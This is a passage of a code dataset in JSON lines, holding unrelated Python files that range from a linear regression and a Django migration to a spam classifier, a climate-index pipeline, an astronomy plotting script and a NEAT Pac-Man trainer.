print(\"KALKULATOR LUAS PERMUKAAN BANGUN RUANG\\n1. Kubus\\n2. Balok\\n3. Tabung\\n4. Kerucut\\n5. Bola\\n6. Exit\")\r\n pilihan = input(\"Pilih menu yang tersedia: \")\r\n if pilihan == \"1\":\r\n kubus()\r\n elif pilihan == \"2\":\r\n balok()\r\n elif pilihan == \"3\":\r\n tabung()\r\n elif pilihan == \"4\":\r\n kerucut()\r\n elif pilihan == \"5\":\r\n bola()\r\n elif pilihan == \"6\":\r\n print(\"TERIMA KASIH!\")\r\n break\r\n else:\r\n print(\"Pilih 1, 2, 3, 4 atau 5, e untuk keluar\\n\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n mulai()","sub_path":"Laprakalgo6.py","file_name":"Laprakalgo6.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373995502","text":"import numpy as np\n\n\nclass Model:\n\t\"\"\"\n\tLinear regression model that predicts output given an input example\n\t\"\"\"\n\tparameters = None\n\n\tdef __init__(self, parameters: np.ndarray):\n\t\t\"\"\"\n\t\tCreates model with given parameters\n\n\t\tparameters: weights for model\n\t\t\"\"\"\n\n\t\tself.parameters = parameters\n\n\tdef predict(self, input_example: np.ndarray):\n\t\t\"\"\"\n\t\tPredicts output value of given example\n\n\t\tinput_example: example to predict\n\t\t\"\"\"\n\t\tassert input_example.shape[0] == 1, \"Example can only contain one row\"\n\t\tassert input_example.shape[1] + 1 == self.parameters.shape[0], f\"Example does not match dimension of model's parameters.\\nInput features: {input_example}\\nParameters (not including bias): {self.parameters}\"\n\n\t\tinput_example = np.hstack((np.ones(shape = (1, 1)), input_example))\n\n\t\tprediction = np.dot(input_example, self.parameters)[0,0]\n\t\tprint(f\"Prediction: {prediction}\\n\")\n\t\treturn np.dot(input_example, self.parameters)[0,0]\n\ndef compute_cost(input_data, output_data, weights, reg_const):\n\t\"\"\"\n\tComputes cost function\n\n\tinput_data: m x n matrix of input data, including bias term\n\toutput_data: m x 1 matrix of correct output data\n\tweights: proposed model to predict output_data from input_data\n\treg_const: regularization constant\n\t\"\"\"\n\tweight_cost = np.sum((np.dot(input_data, weights) - output_data) ** 2)\n\n\treg_term = np.abs(weights) * reg_const\n\treg_term[0,0] = 0\n\treg_term = np.sum(reg_term)\n\n\treturn (1.0 / (input_data.shape[0])) * (weight_cost + reg_term)\n\ndef optimize_weights(input_data, output_data, weights, learning_rate, reg_const, acceptable_error):\n\t\"\"\"\n\tUses gradient descent to optimize weights\n\n\tinput_data: m x n matrix of input data, including bias term\n\toutput_data: m x 1 matrix of correct output data\n\tweights: proposed model to predict output_data from input_data\n\tlearning_rate: rate of gradient descent\n\treg_const: regularization constant\n\tacceptable_error: cost value at which gradient descent terminates\n\t\"\"\"\n\tnum_examples = input_data.shape[0]\n\n\twhile compute_cost(input_data, output_data, weights, reg_const) > acceptable_error:\n\t\treg_term = (reg_const / num_examples) * weights\n\t\treg_term[0,0] = 0\n\t\tupdate_term = (1.0 / num_examples) * np.dot(input_data.T, (np.dot(input_data, weights) - output_data)) + reg_term\n\t\tweights -= learning_rate * update_term\n\t\n\tprint(f\"Final mean-squared error: {compute_cost(input_data, output_data, weights, reg_const)}\")\n\tprint(f\"Finals weights:\\n{weights}\\n\")\n\treturn weights\n\ndef train_model(input_data: np.ndarray, output_data: np.ndarray, learning_rate = 0.01, reg_const = 0, acceptable_error = None) -> np.ndarray:\n\t\"\"\"\n\tTrains a linear regression model based on training data and returns model\n\n\tinput_data: m x n matrix of input data\n\toutput_data: m x 1 matrix output data\n\tlearning_rate: rate of convergence\n\tacceptable_error: highest possible error at which training can terminate\n\t\"\"\"\n\tassert isinstance(input_data, np.ndarray), \"Input training data must be a numpy ndarray\"\n\tassert isinstance(output_data, np.ndarray), \"Output training data must be a numpy ndarray\"\n\tassert input_data.shape[0] == output_data.shape[0], f\"Input training data count must match output training data count.\\nNumber of input training data examples: {input.shape[0]}\\nNumber of output training data examples: {output.shape[0]}\"\n\n\tif acceptable_error is None:\n\t\tacceptable_error = 10 ** (int(np.log10(np.mean(output_data))) - 3)\t#Default error set to 3 orders of magnitude below average output value\n\n\tnum_examples, num_features = input_data.shape[0], input_data.shape[1] + 1\t#Records number of training examples and number of features for each training example\n\n\tinput_data = np.hstack((np.ones(shape = (num_examples, 1)), input_data))\t#Adds bias term to input data\n\t\n\treturn Model(optimize_weights(input_data, output_data, np.zeros(shape = (num_features, 1)), learning_rate, reg_const, acceptable_error))\n\n","sub_path":"linearregression/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363310150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('books', '0016_auto_20160314_1432'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='donation',\n name='donation_date',\n field=models.DateField(help_text='The date on which the donation was made. Best guess if exact date not known.', default=datetime.date.today),\n ),\n migrations.AlterField(\n model_name='expenseclaim',\n name='claim_date',\n field=models.DateField(help_text='The date on which the claim was filed. Best guess if exact date not known.', default=datetime.date.today),\n ),\n migrations.AlterField(\n model_name='sale',\n name='sale_date',\n field=models.DateField(help_text='The date on which the sale was made. Best guess if exact date not known.', default=datetime.date.today),\n ),\n ]\n","sub_path":"books/migrations/0017_auto_20160316_1250.py","file_name":"0017_auto_20160316_1250.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"229563174","text":"from collections import Counter\nfrom math import factorial\n\ndef comb(n,r):\n return factorial(n)//factorial(r)//factorial(n-r)\n\nN,A,B = map(int,input().split())\nV=list(map(int,input().split()))\n\nV_C=Counter(V)\n\nmax_val=max(V)\nCC=V_C[max_val]\nif A<=CC:\n ans=0\n for v in range(A,min(B,CC)+1):\n ans+=comb(CC,v)\n print(max_val)\n print(ans)\n exit()\n\ntmp_sum=0\ntmp_num=0\n\nfor key in sorted(V_C.keys(),reverse=True):\n val = V_C[key]\n #追加しても大丈夫なら加える(加えないとAに行かないから加えないといけない)\n #ぎりAに届くように追加するのが良い\n if A<=tmp_num+val:\n rest=A-tmp_num\n\n tmp_num+=rest\n tmp_sum+=key*rest\n print(tmp_sum/tmp_num)\n print(comb(val,rest))\n exit()\n else:\n tmp_num+=val\n tmp_sum+=key*val\n","sub_path":"Python_codes/p03776/s077898730.py","file_name":"s077898730.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"586667221","text":"\nimport requests\nfrom websocket import create_connection\nimport time\nfrom requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor\nimport json\nimport dill\nimport os\nfrom tqdm import tqdm\nimport sys\nfrom .dummies import import_all, unimport_all\n\n\ndef status_check(res):\n if res.status_code != 200:\n raise ValueError(res.text)\n\nclass ServerConnector():\n\n def __init__(self, username, instanceType):\n self.GPU_SERVER_PORT = '8000'\n self.username = username\n self.type = instanceType\n if instanceType == 'local':\n self.CATALEARN_URL = 'localhost:8080'\n else:\n self.CATALEARN_URL = 'catalearn.com'\n\n # def verify_key(self, key):\n # r = requests.post(\n # 'http://{}/api/admin/verifyKey'.format(self.CATALEARN_URL))\n # status_check(r)\n # res = r.json()\n # if 'err' in res:\n # print(res['err'])\n # return False\n # else:\n # return True\n\n def contact_server(self):\n\n r = requests.post('http://{}/api/gpu/checkAvailability'.format(self.CATALEARN_URL),\n data={'username': self.username,\n 'type': self.type})\n status_check(r)\n res = r.json()\n\n self.jobHash = res['jobHash']\n idle = res['idle']\n instanceId = res['instanceId']\n if not idle:\n print(\"Starting server, this will take about 3 minutes\")\n while True:\n r = requests.post('http://{}/api/gpu/checkStatus'.format(self.CATALEARN_URL),\n data={'instanceId': instanceId})\n status_check(r)\n res = r.json()\n if res['started']:\n break\n time.sleep(3)\n print('.', end='')\n print()\n\n r = requests.post('http://{}/api/gpu/runJob'.format(self.CATALEARN_URL),\n data={'hash': self.jobHash})\n status_check(r)\n res = r.json()\n gpu_hash = res['hash']\n gpu_ip = res['ip']\n ws_port = res['ws_port']\n return (gpu_hash, gpu_ip, ws_port)\n\n def upload_params_decorator(self, gpu_ip, job_hash):\n url = 'http://{}:{}/runJobDecorator'.format(\n gpu_ip, self.GPU_SERVER_PORT, job_hash)\n self.upload_params(url, job_hash)\n\n def upload_params_magic(self, gpu_ip, job_hash):\n url = 'http://{}:{}/runJobMagic'.format(\n gpu_ip, self.GPU_SERVER_PORT, job_hash)\n self.upload_params(url, job_hash)\n\n def upload_params(self, url, job_hash):\n print(\"Uploading data\")\n time.sleep(0.5)\n file_size = os.path.getsize('uploads.pkl')\n\n pbar = tqdm(total=file_size, unit='B', unit_scale=True)\n\n def callback(monitor):\n progress = monitor.bytes_read - callback.last_bytes_read\n pbar.update(progress)\n callback.last_bytes_read = monitor.bytes_read\n callback.last_bytes_read = 0\n\n with open('uploads.pkl', 'rb') as pickle_file:\n data = {\n 'file': ('uploads.pkl', pickle_file, 'application/octet-stream'),\n 'hash': job_hash\n }\n encoder = MultipartEncoder(\n fields=data\n )\n monitor = MultipartEncoderMonitor(encoder, callback)\n r = requests.post(url, data=monitor, headers={\n 'Content-Type': monitor.content_type})\n pbar.close()\n status_check(r)\n\n def stream_output(self, gpu_ip, gpu_hash, ws_port):\n\n gpuUrl = 'ws://{}:{}'.format(gpu_ip, ws_port)\n\n ws = create_connection(gpuUrl)\n\n outUrl = None\n ws.send(gpu_hash)\n try:\n while True:\n message = ws.recv()\n msgJson = json.loads(message)\n if 'end' in msgJson:\n if 'downloadUrl' in msgJson:\n outUrl = msgJson['downloadUrl'] \n else:\n outUrl = None\n ws.close()\n break\n else:\n print(msgJson['message'], end='')\n return outUrl\n except KeyboardInterrupt:\n print('\\nJob interrupted')\n ws.close()\n\n def get_return_object(self, outUrl):\n\n print(\"Downloading result\")\n\n r = requests.post(outUrl, data={'hash' : self.jobHash}, stream=True)\n status_check(r)\n total_size = int(r.headers.get('content-length', 0))\n with open('return.pkl', 'wb') as f:\n pbar = tqdm(total=total_size, unit='B', unit_scale=True)\n chunck_size = 32768\n for data in r.iter_content(chunck_size):\n f.write(data)\n pbar.update(chunck_size)\n pbar.close()\n\n with open('return.pkl', \"rb\") as f:\n\n # import_all() # Hack: a workaround for dill's pickling problem\n result = dill.load(f)\n # unimport_all()\n if result is None:\n print('Computation failed')\n print(\"Done!\")\n return result\n","sub_path":"catalearn/server_connector.py","file_name":"server_connector.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502661229","text":"import re\nimport tkinter as tk\n\nFONT = ('times', 14, 'bold')\n\ndef find(string):\n pattern = r'(?<=ID=)[0-9]+(?=&)'\n try:\n return re.search(pattern, string).group(0)\n except:\n return 'Wrong input format!'\n\nclass SimpleGui(tk.Frame):\n def __init__(self, parent=None, *args, **kargs):\n tk.Frame.__init__(self, parent, *args, **kargs)\n self.master.title('Определение ID задачи')\n self.pack(expand='yes', fill='both')\n self.makewidgets()\n self.tempstore=['', '']\n def makewidgets(self):\n top = tk.Frame(self)\n top.pack(side='top', expand='yes', fill='both')\n mid = tk.Frame(self)\n mid.pack(side='left', fill='x')\n bottom = tk.Frame(self)\n bottom.pack(side='right', expand='yes', fill='x')\n self.txt = tk.Text(top, relief='sunken')\n self.txt.bind('', self.find)\n self.txt.pack(expand='yes', fill='both')\n button_find = tk.Button(mid, text='ID find', command=self.find, height=3, width=30)\n button_find.pack(side='left')\n button_delete = tk.Button(mid, text='Delete', command=lambda:self.txt.delete('1.0', 'end'), height=3, width=30)\n button_delete.pack(side='left')\n self.label_1 = tk.Label(bottom, font=FONT)\n self.label_1.pack(side='top', expand='yes')\n self.label_2 = tk.Label(bottom)\n self.label_2.pack(side='top', expand='yes')\n def find(self, event):\n string = self.txt.get('1.0', 'end-1c')\n if not string:\n self.tempstore[1] = self.tempstore[0]\n self.tempstore[0] = 'empty'\n self.label_1.config(text=self.tempstore[0])\n self.label_2.config(text=self.tempstore[1])\n self.tempstore[0] = 'Previous = ' + self.tempstore[0]\n else:\n store = find(string)\n self.tempstore[1] = self.tempstore[0]\n self.tempstore[0] = store\n self.label_1.config(text=self.tempstore[0])\n self.label_2.config(text=self.tempstore[1])\n self.tempstore[0] = 'Previous = ' + store\n\nSimpleGui().mainloop()\n","sub_path":"FID_gui.py","file_name":"FID_gui.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538726110","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 28 22:26:10 2017\n\n@author: JohannesMHeinrich\n\"\"\"\n\nfrom numpy import diff\n\n\ndx = 1.0\ny = [0,1,4,9,16,25]\ndy = diff(y)/dx\nprint(dy)\n\n\nprint('_______________________________')\n\n\n\ndef do_derivative(list_a,list_b):\n \n derivative_x = []\n derivative_y = []\n \n for i in range(len(list_a)-1):\n x_1 = float(list_a[i])\n x_2 = float(list_a[i+1])\n y_1 = float(list_b[i])\n y_2 = float(list_b[i+1])\n \n dy = (y_2 - y_1)\n dx = (x_2 - x_1)\n \n derivative_x.append(float(x_1 + dx/2.0))\n derivative_y.append(float(dy/dx))\n \n return derivative_x, derivative_y\n \n \n \n \n\nx_list = (-5,-4,-3,-2,-1,0,1,2,3,4,5)\ny_list = (25,16,9,4,1,0,1,4,9,16,25)\n\n\ntesta, testb = do_derivative(x_list,y_list)\n\nprint(testa)\nprint(testb)\n\n\n\n","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91095280","text":"import numpy as np\nimport pandas as pd\nfrom astropy.cosmology import FlatLambdaCDM\ncosmo = FlatLambdaCDM(H0=70, Om0=0.3)\nfrom astropy.cosmology import z_at_value\nimport fsps\nfrom matplotlib import gridspec\nfrom astropy.io import fits\nimport astropy.units as u\nfrom sim_engine import Scale_model\nfrom spec_tools import Source_present, Oldest_galaxy, Sig_int, Smooth, Rescale_sfh, \\\n lbt_to_z, boot_to_posterior, age_to_z, Posterior_spec\nfrom spec_stats import Smooth, Highest_density_region, Linear_fit\nfrom spec_id import *\nfrom spec_id_2d import Gen_temp_dict_addline\nfrom spec_stats import Highest_density_region, Linear_fit\nfrom spec_exam import Gen_spec\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d, interp2d\nfrom glob import glob\nimport seaborn as sea\nimport os\nfrom grizli import multifit\nfrom grizli import model\nfrom grizli.utils import SpectrumTemplate\nfrom sim_engine import forward_model_grism\n\nsea.set(style='white')\nsea.set(style='ticks')\nsea.set_style({'xtick.direct'\n 'ion': 'in','xtick.top':True,'xtick.minor.visible': True,\n 'ytick.direction': \"in\",'ytick.right': True,'ytick.minor.visible': True})\ncmap = sea.cubehelix_palette(12, start=2, rot=.2, dark=0, light=1.0, as_cmap=True)\n\n### set home for files\nhpath = os.environ['HOME'] + '/'\n\nif hpath == '/Users/Vince.ec/':\n dpath = '/Volumes/Vince_research/Data/' \n \nelse:\n dpath = hpath + 'Data/' \n \nadb = pd.read_pickle('../dataframes/fitdb/evolution_db.pkl')\nAdb = adb.query('AGN != \"AGN\" and lmass > 10 and concen < -0.4 and 0.7 < zgrism < 2.7')\n \nfrom spec_id import Calibrate_grism, Scale_model\ndef Best_fit_scale(wv, fl, er, mfl, p1):\n cal = Calibrate_grism([wv, fl, er], mfl, p1)\n scale = Scale_model(fl / cal, er/ cal, mfl)\n FL = fl/ cal/ scale\n ER = er/ cal/ scale\n return FL, ER\n\ndef Q_spec_adjust(Gs, bestfits):\n sp = fsps.StellarPopulation(zcontinuous = 1, logzsol = 0, sfh = 3, dust_type = 1)\n wvs, flxs, errs, beams, trans = Gather_grism_data_from_2d(Gs, sp)\n\n m, a, m1, m2, m3, m4, m5, m6, m7, m8, m9, m10, lm, z, d,\\\n bp1, rp1, ba, bb, bl, ra, rb, rl, lwa, logz= BFS\n\n sp.params['dust2'] = d\n sp.params['dust1'] = d\n sp.params['logzsol'] = np.log10(m)\n \n time, sfr, tmax = convert_sfh(get_agebins(a), [m1, m2, m3, m4, m5, m6, m7, m8, m9, m10], maxage = a*1E9)\n\n sp.set_tabular_sfh(time,sfr) \n\n wave, flux = sp.get_spectrum(tage = a, peraa = True)\n\n Gmfl, Pmfl = Full_forward_model(Gs, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm, z, \n wvs, flxs, errs, beams, trans)\n \n BFL, BER = Best_fit_scale(wvs[0], flxs[0], errs[0], Gmfl[0], bp1)\n RFL, RER = Best_fit_scale(wvs[1], flxs[1], errs[1], Gmfl[1], rp1)\n \n return BFL, BER, RFL, RER, Gmfl, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm\n\ndef SF_spec_adjust(Gs, bestfits, z):\n sp = fsps.StellarPopulation(zcontinuous = 1, logzsol = 0, sfh = 3, dust_type = 2)\n sp.params['dust1'] = 0\n \n wvs, flxs, errs, beams, trans = Gather_grism_data_from_2d(Gs, sp)\n\n m, a, m1, m2, m3, m4, m5, m6, lm, d, bp1, rp1, ba, bb, bl, ra, rb, rl= BFS\n\n sp.params['dust2'] = d\n sp.params['logzsol'] = np.log10(m)\n\n time, sfr, tmax = convert_sfh(get_agebins(a, binnum = 6), [m1, m2, m3, m4, m5, m6], maxage = a*1E9)\n\n sp.set_tabular_sfh(time,sfr) \n\n wave, flux = sp.get_spectrum(tage = a, peraa = True)\n\n Gmfl, Pmfl = Full_forward_model(Gs, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm, z, \n wvs, flxs, errs, beams, trans)\n \n BFL, BER = Best_fit_scale(wvs[0], flxs[0], errs[0], Gmfl[0], bp1)\n RFL, RER = Best_fit_scale(wvs[1], flxs[1], errs[1], Gmfl[1], rp1)\n \n return BFL, BER, RFL, RER, Gmfl, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm\n\nfrom spec_id import convert_sfh, Full_forward_model, Full_calibrate_2, get_agebins, F_lam_per_M\n\n\ngs = gridspec.GridSpec(2,2, hspace = 0.3, wspace=0.15)\n\nplt.figure(figsize=[15,8])\n\nLDX = 0 \nTDX = 0\n\n# gid = [36795,45994,21156,39170]\n# field = ['GND','GSD','GND','GSD']\ngid = [16499,45994,16499,45994]\nfield = ['GND','GSD','GND','GSD']\n# usedb = [True, True, False,False]\n# sf = ['SF', 'SF', 'Q', 'Q']\nusedb = [True, True, True, True]\nsf = ['SF', 'SF', 'SF', 'SF']\nfor i in range(4): \n x=i\n Gs = Gen_spec_2D(field[x], gid[x],Adb.query('id == {}'.format(gid[x])).zgrism.values[0], g102_lims=[8200, 11300], g141_lims=[11200, 16000],\n phot_errterm = 0.04, irac_err = 0.08,)\n\n if usedb[x]:\n params = ['m', 'a', 'm1', 'm2', 'm3', 'm4', 'm5', 'm6', 'lm', 'd', 'bp1', \n 'rp1', 'ba', 'bb', 'bl', 'ra', 'rb', 'rl']\n BFS = []\n\n for i in params:\n BFS.append(Adb.query('field == \"{}\" and id == {}'.format(field[x], gid[x]))['bf{}'.format(i)].values[0])\n else:\n BFS = np.load('../data/bestfits/{}_{}_tabfit_bfit.npy'.format(field[x], gid[x]))\n\n\n if sf[x] == 'SF':\n BFL, BER, RFL, RER, Gmfl, wave, flam = SF_spec_adjust(Gs, BFS, Gs.specz)\n else:\n BFL, BER, RFL, RER, Gmfl, wave, flam = Q_spec_adjust(Gs, BFS)\n\n ax = plt.subplot(gs[TDX,LDX])\n if i == 0:\n ax.errorbar(np.log10(Gs.Bwv_rf),BFL*1E18, BER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#1f8ba3', zorder = 2, elinewidth = 0.4, alpha = 1, label = 'G102')\n else:\n ax.errorbar(np.log10(Gs.Bwv_rf),BFL*1E18, BER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#1f8ba3', zorder = 2, elinewidth = 0.4, alpha = 1)\n ax.plot(np.log10(Gs.Bwv_rf),Gmfl[0] *1E18,'k', zorder = 4, alpha = 0.75)\n IDB = [U for U in range(len(wave)) if wave[U] < Gs.Bwv_rf[0]]\n\n if i ==0:\n ax.errorbar(np.log10(Gs.Rwv_rf),RFL*1E18, RER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#dc1f22', zorder = 2, elinewidth = 0.4, alpha = 1, label = 'G102')\n else:\n ax.errorbar(np.log10(Gs.Rwv_rf),RFL*1E18, RER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#dc1f22', zorder = 2, elinewidth = 0.4, alpha = 1)\n ax.plot(np.log10(Gs.Rwv_rf),Gmfl[1] *1E18,'k', zorder = 4, alpha = 0.75)\n IDR = [U for U in range(len(wave)) if wave[U] > Gs.Rwv_rf[-1]]\n\n if i==0:\n ax.errorbar(np.log10(Gs.Pwv_rf),Gs.Pflx*1E18,Gs.Perr*1E18,\n linestyle='None', marker='o', markersize=10, markerfacecolor='#8a1e72', zorder = 1,\n markeredgecolor = '#685877',markeredgewidth = 1, label = 'Photometry')\n else:\n ax.errorbar(np.log10(Gs.Pwv_rf),Gs.Pflx*1E18,Gs.Perr*1E18,\n linestyle='None', marker='o', markersize=10, markerfacecolor='#8a1e72', zorder = 1,\n markeredgecolor = '#685877',markeredgewidth = 1)\n\n ax.plot(np.log10(wave)[IDB],flam[IDB]*1E18,'k', alpha = 0.75, zorder=5)\n ax.plot(np.log10(wave)[IDR],flam[IDR]*1E18,'k', alpha = 0.75)\n ax.set_xlim(np.log10(min(Gs.Pwv_rf)*0.95),np.log10(max(Gs.Pwv_rf)*1.05))\n \n fmax = max(Gs.Rfl *1E18)\n \n if fmax < max(Gs.Bfl *1E18):\n fmax = max(Gs.Bfl *1E18)\n \n if fmax < max(Gs.Pflx *1E18):\n fmax = max(Gs.Pflx *1E18)\n \n \n ax.legend(title ='{}-{}, z={}'.format(field[x], gid[x], np.round(Gs.specz,3)), fontsize = 12)\n ax.set_ylim(-0.1,fmax*1.1)\n ax.set_xticks(np.log10([2500,5000,10000,25000]))\n ax.set_xticklabels(np.array([2500,5000,10000,25000]))\n ax.set_xlabel(r'Wavelength ($\\rm \\AA$)', fontsize=18)\n ax.set_ylabel(r'F$_\\lambda$', fontsize=20)\n ax.tick_params(axis='both', which='major', labelsize=15)\n ax.get_legend().get_title().set_fontsize('15')\n\n if LDX == 0:\n LDX += 1\n else:\n LDX = 0\n TDX +=1\n\nplt.savefig('../plots/evolution_plots/spec_plot.png', bbox_inches = 'tight') \n\n\n\n\n","sub_path":"scripts/evo_spec_data.py","file_name":"evo_spec_data.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"107198406","text":"MAX = 1000000\ndp = [1] * (MAX + 1)\ns = [0] * (MAX + 1)\n\nfor i in range(2, MAX + 1):\n j = 1\n while i * j <= MAX:\n dp[i * j] += i\n j+=1\nfor i in range(1, MAX + 1):\n s[i] = s[i-1] + dp[i]\n\niter = int(input())\nans = []\nfor k in range(iter):\n n = int(input())\n ans.append(s[n])\nprint('\\n'.join(map(str,ans)) + '\\n')\n","sub_path":"Algorithm/Baekjoon/17425.py","file_name":"17425.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323016647","text":"# importing packages\r\nimport pandas as pd\r\nimport numpy as np\r\n# preprocessing the data\r\ndata = pd.read_csv('spam.csv', encoding = 'latin-1')\r\ndata = data.drop(['Unnamed: 2', 'Unnamed: 3', 'Unnamed: 4'], axis = 1)\r\n# encoding Data\r\ndata['label'] = pd.factorize(data['label'])[0]\r\n# module for removing unwanted words\r\nimport re\r\nimport nltk\r\nnltk.download(\"stopwords\")\r\nfrom nltk.corpus import stopwords\r\n\r\n# for stemming words\r\nfrom nltk.stem.porter import PorterStemmer\r\ntemp = []\r\nfor row in data.itertuples():\r\n # to keep a - z letters and 0 - 9\r\n rev = re.sub(\"[^0-9a-zA-Z]\",\" \",row[2])\r\n rev = rev.lower()\r\n rev = rev.split()\r\n ps = PorterStemmer()\r\n rev = [ps.stem(word) for word in rev if not word in set(stopwords.words(\"english\"))]\r\n rev = \" \".join(rev)\r\n temp.append(rev)\r\ndata['msg'] = temp\r\n\r\n# splitting data\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(data['msg'], data['label'], test_size = 0.25)\r\n\r\n# creating bag of words model\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\ncv = CountVectorizer(max_features = 410)\r\ncv.fit(data['msg'])\r\nX_train = cv.transform(X_train)\r\nX_test = cv.transform(X_test)\r\n\r\n# Training classifier\r\nfrom sklearn.svm import SVC\r\nclassifier = SVC(kernel='rbf')\r\nclassifier.fit(X_train, y_train)\r\ny_pred = classifier.predict(X_test)\r\n\r\n#Confusion Matrix [1204 2]\r\n# [82 105] 93.96\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\nprint(cm)","sub_path":"Classification_Trails/On Kaggle/SVM_rbf_Kernal.py","file_name":"SVM_rbf_Kernal.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506595190","text":"import numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nfrom ninolearn.utils import include_time_lag\nfrom ninolearn.IO.read_processed import data_reader\n\ndef pipeline(lead_time, return_persistance=False):\n \"\"\"\n Data pipeline for the processing of the data before the Deep Ensemble\n is trained.\n\n :type lead_time: int\n :param lead_time: The lead time in month.\n\n :type return_persistance: boolean\n :param return_persistance: Return as the persistance as well.\n\n :returns: The feature \"X\" (at observation time), the label \"y\" (at lead\n time), the target season \"timey\" (least month) and if selected the\n label at observation time \"y_persistance\". Hence, the output comes as:\n X, y, timey, y_persistance.\n \"\"\"\n reader = data_reader(startdate='1960-01', enddate='2017-12')\n\n # indeces\n oni = reader.read_csv('oni')\n\n iod = reader.read_csv('iod')\n wwv = reader.read_csv('wwv_proxy')\n\n # seasonal cycle\n sc = np.cos(np.arange(len(oni))/12*2*np.pi)\n\n # network metrics\n network_ssh = reader.read_statistic('network_metrics', variable='zos', dataset='ORAS4', processed=\"anom\")\n c2_ssh = network_ssh['fraction_clusters_size_2']\n H_ssh = network_ssh['corrected_hamming_distance']\n\n #wind stress\n taux = reader.read_netcdf('taux', dataset='NCEP', processed='anom')\n\n taux_WP = taux.loc[dict(lat=slice(2.5,-2.5), lon=slice(120, 160))]\n taux_WP_mean = taux_WP.mean(dim='lat').mean(dim='lon')\n\n # decadel variation of leading eof\n pca_dec = reader.read_statistic('pca', variable='dec_sst', dataset='ERSSTv5', processed='anom')['pca1']\n\n\n # time lag\n time_lag = 12\n\n # shift such that lead time corresponds to the definition of lead time\n shift = 3\n\n # process features\n feature_unscaled = np.stack((oni, sc, wwv, iod,\n taux_WP_mean,\n c2_ssh, H_ssh,\n pca_dec), axis=1)\n\n # scale each feature\n scalerX = StandardScaler()\n Xorg = scalerX.fit_transform(feature_unscaled)\n\n # set nans to 0.\n Xorg = np.nan_to_num(Xorg)\n\n # arange the feature array\n X = Xorg[:-lead_time-shift,:]\n X = include_time_lag(X, max_lag=time_lag)\n\n # arange label\n yorg = oni.values\n y = yorg[lead_time + time_lag + shift:]\n\n # get the time axis of the label\n timey = oni.index[lead_time + time_lag + shift:]\n\n if return_persistance:\n y_persistance = yorg[time_lag: - lead_time - shift]\n return X, y, timey, y_persistance\n else:\n return X, y, timey","sub_path":"research/Master_Thesis/data_pipeline.py","file_name":"data_pipeline.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"479117993","text":"\"\"\"\n2-input XOR example -- this is most likely the simplest possible example.\n\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport neat, GameController, pickle\n# 2-input XOR inputs and expected outputs.\npac_inputs = [(0, 0, 0, 0, 1, 1, 1, 0, 0, -1), (0, 0, 0, 0, 1, 1, 0, 1, 0, 1), (0, 0, 0, 0, 0, 1, 1, 1, -1, 0), (0, 0, 0, 0, 1, 0, 1, 1, 1, 0)]\npac_outputs = [\"left\", \"right\", \"up\", \"down\"]\n\n\nclass NEATHandler(object):\n\n def __init__(self, gens):\n self.gens = gens\n self.gen = 1\n self.num = 1\n self.numPerGen = 50\n\n self.run()\n\n def eval_genomes(self, genomes, config):\n for genome_id, genome in genomes:\n self.game_over = False\n self.final_score = 0\n self.inputs = []\n self.net = neat.nn.FeedForwardNetwork.create(genome, config)\n game = GameController.GameController(self)\n\n while not self.game_over:\n pass\n genome.fitness = self.final_score\n\n if self.num % self.numPerGen == 0:\n self.num = 1\n self.gen += 1\n self.num += 1\n\n def select_key_from_net(self):\n outputs = self.net.activate(self.inputs)\n return pac_outputs[outputs.index(max(outputs))]\n\n def end_game(self, score):\n self.game_over = True\n self.final_score = score\n\n def set_inputs(self, inputs):\n self.inputs = inputs\n\n def run(self):\n # Load configuration.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n config = neat.Config(neat.DefaultGenome, 